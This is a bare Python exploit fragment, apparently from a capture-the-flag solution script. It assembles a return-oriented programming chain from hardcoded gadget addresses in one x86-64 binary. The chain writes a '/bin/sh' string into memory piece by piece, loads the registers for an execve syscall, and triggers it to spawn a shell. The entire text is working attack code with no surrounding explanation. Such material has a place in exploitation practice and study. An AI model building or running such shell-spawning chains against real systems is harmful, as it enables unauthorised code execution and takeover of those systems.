payload = p64(0x401f55)
#0x0000000000401f55: pop rbx; pop rbp; ret; 
payload += p64(0x80)+p64(0x40c1de)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401f55)
# 0x0000000000401f55: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40c0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x401f55)
# 0x0000000000401f55: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40c0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40c070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x403b11)
# 0x0000000000403b11: pop rax; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x36b0bfb6)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x403b11)
# 0x0000000000403b11: pop rax; pop rbx; pop r12; pop r13; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x404acb)
# 0x0000000000404acb: syscall; 
payload += b''
